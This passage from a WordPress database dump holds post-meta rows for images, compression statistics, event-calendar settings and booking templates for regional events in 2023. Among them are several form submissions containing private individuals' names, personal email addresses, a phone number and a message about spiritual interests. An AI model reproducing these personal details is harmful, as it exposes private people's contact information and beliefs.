webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4702;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188107,268835,'mec_timezone','global'),(188023,268810,'_form_id','17'),(188024,268810,'_seq_num','21'),(188025,268811,'_edit_lock','1692455479:15'),(188026,268811,'_edit_last','2'),(188027,268811,'_has_fluentform','a:1:{i:4;s:1:\"4\";}'),(188029,268811,'_wp_page_template','default'),(188030,268811,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(188031,268811,'boldgrid_hide_page_title','0'),(188032,268811,'protect_children',''),(188033,268811,'boldgrid_in_page_containers','1'),(188034,268811,'bgseo_robots_index','index'),(188035,268811,'bgseo_robots_follow','follow'),(188036,268816,'_wp_attached_file','2023/07/2023-regional-brochure-web-display.pdf'),(188037,268816,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:42:\"2023-regional-brochure-web-display-pdf.jpg\";s:5:\"width\";i:1440;s:6:\"height\";i:1120;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:249713;}s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"2023-regional-brochure-web-display-pdf-252x196.jpg\";s:5:\"width\";i:252;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14326;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"2023-regional-brochure-web-display-pdf-1024x796.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132273;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"2023-regional-brochure-web-display-pdf-150x117.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7543;}}s:8:\"filesize\";i:670891;}'),(188064,268827,'_wp_attached_file','2023/07/orange-bk-4.jpg'),(188065,268827,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:23:\"2023/07/orange-bk-4.jpg\";s:8:\"filesize\";i:176794;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5471;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"orange-bk-4-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39299;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2262;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22521;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7077;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18087;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11310;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7721;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"orange-bk-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9068;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"orange-bk-4-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85604;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188066,268828,'_wp_attached_file','2023/07/creamy-orange-bk-2.jpg'),(188067,268828,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:30:\"2023/07/creamy-orange-bk-2.jpg\";s:8:\"filesize\";i:103568;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4569;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"creamy-orange-bk-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23130;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1673;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14493;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4215;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8781;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7552;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5571;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"creamy-orange-bk-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4218;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:31:\"creamy-orange-bk-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46221;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188068,268828,'original-file','2023/07/creamy-orange-bk-2-updraft-pre-smush-original.jpg'),(188069,268828,'smush-complete','1'),(188070,268828,'smush-info','The file was compressed from 101.14 KB to 84.70 KB saving 16.25 percent using WP-Optimize'),(188071,268828,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:103568;s:12:\"smushed-size\";i:86737;s:15:\"savings-percent\";d:16.25;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:103568;s:10:\"compressed\";i:86737;}s:6:\"medium\";a:2:{s:8:\"original\";i:4569;s:10:\"compressed\";i:4503;}s:5:\"large\";a:2:{s:8:\"original\";i:23130;s:10:\"compressed\";i:23130;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:1673;s:10:\"compressed\";i:1607;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:14493;s:10:\"compressed\";i:14493;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:4215;s:10:\"compressed\";i:4149;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:8781;s:10:\"compressed\";i:8715;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:7552;s:10:\"compressed\";i:7486;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:5571;s:10:\"compressed\";i:5505;}s:8:\"tileview\";a:2:{s:8:\"original\";i:4218;s:10:\"compressed\";i:4152;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:46221;s:10:\"compressed\";i:46221;}}}'),(188072,268827,'original-file','2023/07/orange-bk-4-updraft-pre-smush-original.jpg'),(188073,268827,'smush-complete','1'),(188074,268827,'smush-info','The file was compressed from 172.65 KB to 152.17 KB saving 11.86 percent using WP-Optimize'),(188075,268827,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:176794;s:12:\"smushed-size\";i:155819;s:15:\"savings-percent\";d:11.8599999999999994315658113919198513031005859375;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:176794;s:10:\"compressed\";i:155819;}s:6:\"medium\";a:2:{s:8:\"original\";i:5471;s:10:\"compressed\";i:5405;}s:5:\"large\";a:2:{s:8:\"original\";i:39299;s:10:\"compressed\";i:39299;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2262;s:10:\"compressed\";i:2196;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:22521;s:10:\"compressed\";i:22521;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:7077;s:10:\"compressed\";i:7011;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:18087;s:10:\"compressed\";i:18087;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:11310;s:10:\"compressed\";i:11310;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:7721;s:10:\"compressed\";i:7655;}s:8:\"tileview\";a:2:{s:8:\"original\";i:9068;s:10:\"compressed\";i:9002;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:85604;s:10:\"compressed\";i:85604;}}}'),(188105,268835,'mec_hide_end_time','0'),(188106,268835,'mec_comment',''),(188078,268833,'_field_224','Barrett'),(188079,268833,'_field_225','Hendricks'),(188080,268833,'_field_226','barrett.hendricks@gmail.com'),(188081,268833,'_field_227','CO'),(188082,268833,'_field_228','US'),(188083,268833,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(188084,268833,'_form_id','21'),(188085,268833,'_seq_num','179'),(188086,268835,'protect_children',''),(188087,268835,'mec_color',''),(188088,268835,'mec_location_id','198'),(188089,268835,'mec_dont_show_map','0'),(188090,268835,'mec_organizer_id','1'),(188091,268835,'mec_read_more',''),(188092,268835,'mec_more_info',''),(188093,268835,'mec_more_info_title',''),(188094,268835,'mec_more_info_target','_self'),(188095,268835,'mec_cost',''),(188096,268835,'mec_currency','a:0:{}'),(188097,268835,'mec_additional_organizer_ids','a:0:{}'),(188098,268835,'mec_additional_location_ids','a:0:{}'),(188099,268835,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-09\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-09\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188100,268835,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188101,268835,'mec_certain_weekdays','a:0:{}'),(188102,268835,'mec_allday','0'),(188103,268835,'one_occurrence','0'),(188104,268835,'mec_hide_time','0'),(188022,268810,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(188021,268810,'_field_183','US'),(188020,268810,'_field_182','CO'),(188019,268810,'_field_181','billybobak@yahoo.com'),(188018,268810,'_field_180','Massengale '),(184703,268639,'protect_children',''),(184704,268639,'mec_color',''),(184705,268639,'mec_location_id','193'),(184706,268639,'mec_dont_show_map','0'),(184707,268639,'mec_organizer_id','1'),(184708,268639,'mec_read_more',''),(184709,268639,'mec_more_info',''),(184710,268639,'mec_more_info_title',''),(184711,268639,'mec_more_info_target','_self'),(184712,268639,'mec_cost',''),(184713,268639,'mec_currency','a:0:{}'),(184714,268639,'mec_additional_organizer_ids','a:0:{}'),(184715,268639,'mec_additional_location_ids','a:0:{}'),(184716,268639,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-24\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-24\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"2\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:1:\"2\";}}'),(184717,268639,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"2\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:1:\"2\";}'),(184718,268639,'mec_certain_weekdays','a:0:{}'),(184719,268639,'mec_allday','0'),(184720,268639,'one_occurrence','0'),(184721,268639,'mec_hide_time','0'),(184722,268639,'mec_hide_end_time','0'),(184723,268639,'mec_comment',''),(184724,268639,'mec_timezone','global'),(184725,268639,'mec_countdown_method','global'),(184726,268639,'mec_public','1'),(184727,268639,'mec_start_date','2023-06-24'),(184728,268639,'mec_start_time_hour','10'),(184729,268639,'mec_start_time_minutes','0'),(184730,268639,'mec_start_time_ampm','AM'),(184731,268639,'mec_start_day_seconds','36000'),(184732,268639,'mec_end_date','2023-06-24'),(184733,268639,'mec_end_time_hour','7'),(184734,268639,'mec_end_time_minutes','0'),(184735,268639,'mec_end_time_ampm','PM'),(184736,268639,'mec_end_day_seconds','68400'),(184737,268639,'mec_repeat_status','1'),(184738,268639,'mec_repeat_type','custom_days'),(184739,268639,'mec_repeat_interval','2'),(184740,268639,'mec_repeat_end','never'),(184741,268639,'mec_repeat_end_at_occurrences','1'),(184742,268639,'mec_repeat_end_at_date',''),(184743,268639,'mec_advanced_days','a:0:{}'),(184744,268639,'mec_in_days',''),(184745,268639,'mec_not_in_days',''),(184746,268639,'mec_hourly_schedules','a:0:{}'),(184747,268639,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184748,268639,'mec_tickets','a:0:{}'),(184749,268639,'mec_fees_global_inheritance','1'),(184750,268639,'mec_fees','a:0:{}'),(184751,268639,'mec_ticket_variations_global_inheritance','1'),(184752,268639,'mec_ticket_variations','a:0:{}'),(184753,268639,'mec_reg_fields_global_inheritance','1'),(184754,268639,'mec_reg_fields','a:0:{}'),(184755,268639,'mec_bfixed_fields','a:0:{}'),(184756,268639,'mec_op','a:0:{}'),(184757,268639,'mec_fields','a:0:{}'),(184758,268639,'mec_event_status','EventScheduled'),(184759,268639,'mec_moved_online_link',''),(184760,268639,'mec_cancelled_reason',''),(184761,268639,'mec_display_cancellation_reason_in_single_page',''),(184762,268639,'boldgrid_hide_page_title','0'),(184763,268639,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(184764,268639,'passster_activate_global_protection',NULL),(184765,268639,'passster_activate_protection',NULL),(184766,268639,'passster_protection_type','password'),(184767,268639,'boldgrid_in_page_containers','1'),(184770,268639,'_dp_original','266888'),(184771,268639,'_edit_lock','1687288927:2'),(184772,268639,'passster_area_shortcode',''),(184773,268639,'_edit_last','2'),(184774,266888,'passster_area_shortcode',''),(184786,268641,'smush-info','The file was compressed from 108.93 KB to 105.18 KB saving 3.44 percent using WP-Optimize'),(184787,268641,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:111542;s:12:\"smushed-size\";i:107704;s:15:\"savings-percent\";d:3.439999999999999946709294817992486059665679931640625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:111542;s:10:\"compressed\";i:107704;}s:6:\"medium\";a:2:{s:8:\"original\";i:24784;s:10:\"compressed\";i:24304;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9395;s:10:\"compressed\";i:9395;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:30323;s:10:\"compressed\";i:29900;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:49759;s:10:\"compressed\";i:48973;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:35553;s:10:\"compressed\";i:34874;}s:8:\"tileview\";a:2:{s:8:\"original\";i:36729;s:10:\"compressed\";i:36369;}}}'),(184785,268641,'smush-complete','1'),(184783,268639,'_thumbnail_id','268641'),(184784,268641,'original-file','2023/06/highlands-street-fair-2-updraft-pre-smush-original.jpg'),(184781,268641,'_wp_attached_file','2023/06/highlands-street-fair-2.jpg'),(184782,268641,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:755;s:6:\"height\";i:435;s:4:\"file\";s:35:\"2023/06/highlands-street-fair-2.jpg\";s:8:\"filesize\";i:111542;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"highlands-street-fair-2-340x196.jpg\";s:5:\"width\";i:340;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24784;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"highlands-street-fair-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9395;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:35:\"highlands-street-fair-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30323;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:35:\"highlands-street-fair-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49759;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:35:\"highlands-street-fair-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35553;}s:8:\"tileview\";a:5:{s:4:\"file\";s:35:\"highlands-street-fair-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36729;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(184790,268643,'_wp_attached_file','2023/06/2023-regional-registration-form-web.pdf'),(184791,268643,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:43:\"2023-regional-registration-form-web-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197174;}s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"2023-regional-registration-form-web-pdf-151x196.jpg\";s:5:\"width\";i:151;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9818;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"2023-regional-registration-form-web-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"2023-regional-registration-form-web-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7088;}}s:8:\"filesize\";i:107719;}'),(184792,268644,'_field_450','Brittney '),(184793,268644,'_field_451','Kuck'),(184794,268644,'_field_458','9706736703'),(184795,268644,'_field_452','brittney.kuck@gmail.com'),(184796,268644,'_field_453','Event calendar for Loveland colorado'),(184797,268644,'_field_454','Hello, I am extremely interested In these classes specifically the past lives class and am being called to learn as much information as I can. I would really love to attend, thank you'),(184798,268644,'_form_id','49'),(184799,268644,'_seq_num','12'),(184800,268645,'_wp_attached_file','2023/06/2023-regional-brochure-and-GUEST-registration-web.pdf'),(184801,268645,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:57:\"2023-regional-brochure-and-GUEST-registration-web-pdf.jpg\";s:5:\"width\";i:1440;s:6:\"height\";i:1120;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247684;}s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"2023-regional-brochure-and-GUEST-registration-web-pdf-252x196.jpg\";s:5:\"width\";i:252;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13008;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"2023-regional-brochure-and-GUEST-registration-web-pdf-1024x796.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131176;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"2023-regional-brochure-and-GUEST-registration-web-pdf-150x117.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6169;}}s:8:\"filesize\";i:1630644;}'),(184802,268623,'boldgrid_in_page_containers','1'),(184809,268657,'original-file','2023/06/2023-regional-sas-webpromo-bk-1-updraft-pre-smush-original.jpg'),(184810,268657,'smush-complete','1'),(184811,268657,'smush-info','The file was compressed from 79.72 KB to 75.16 KB saving 5.72 percent using WP-Optimize'),(184812,268657,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81633;s:12:\"smushed-size\";i:76961;s:15:\"savings-percent\";d:5.71999999999999975131004248396493494510650634765625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:81633;s:10:\"compressed\";i:76961;}s:6:\"medium\";a:2:{s:8:\"original\";i:7066;s:10:\"compressed\";i:7000;}s:5:\"large\";a:2:{s:8:\"original\";i:42187;s:10:\"compressed\";i:41057;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3964;s:10:\"compressed\";i:3898;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:26415;s:10:\"compressed\";i:25768;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:12465;s:10:\"compressed\";i:12435;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:18937;s:10:\"compressed\";i:18709;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:13299;s:10:\"compressed\";i:13170;}s:8:\"tileview\";a:2:{s:8:\"original\";i:16569;s:10:\"compressed\";i:16496;}}}'),(184813,268661,'protect_children',''),(184814,268661,'mec_color',''),(184815,268661,'mec_location_id','131'),(184816,268661,'mec_dont_show_map','0'),(184817,268661,'mec_organizer_id','1'),(184818,268661,'mec_read_more',''),(184819,268661,'mec_more_info',''),(184820,268661,'mec_more_info_title',''),(184821,268661,'mec_more_info_target','_self'),(184822,268661,'mec_cost',''),(184823,268661,'mec_currency','a:0:{}'),(184824,268661,'mec_additional_organizer_ids','a:0:{}'),(184825,268661,'mec_additional_location_ids','a:0:{}'),(184826,268661,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-09\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-09\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(184827,268661,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8